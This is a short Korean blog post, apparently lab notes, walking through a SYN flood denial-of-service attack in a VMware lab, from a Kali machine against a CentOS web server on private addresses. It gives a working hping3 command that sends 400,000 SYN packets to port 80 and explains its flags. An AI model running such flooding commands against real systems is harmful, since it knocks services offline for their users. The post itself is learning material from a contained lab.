[자원소진 공격] SYN Flood

BEEUM·2024년 5월 2일
post-thumbnail
  • 모든 실습은 VM Ware 환경에서 진행됩니다

실습환경

공격자 : kali linux
공격자 IP : 192.168.0.138

공격 대상 : Cent OS
사전 준비 : HTTP 서비스 활성화 (80번 포트 Open)
피해자 IP : 192.168.0.135

공격 실행

1) Kali 에서 터미널 실행

hping3 명령어를 이용하여 SYN 패킷 전송

# hping3 192.168.0.135 -p 80 -S --faster -c 400000
  • -c 400000 : 40만개 패킷만 보냄
  • -p : 목적지 포트 설정
  • -S : TCP SYN 패킷을 보냄

2) 공격 대상 PC 에서 Network History 증가 확인

3) Wireshark 로 보낸 패킷 확인

칼리 리눅스의 특성으로 RST 보내는 거 적기

profile
정보보안 꿈나무

0개의 댓글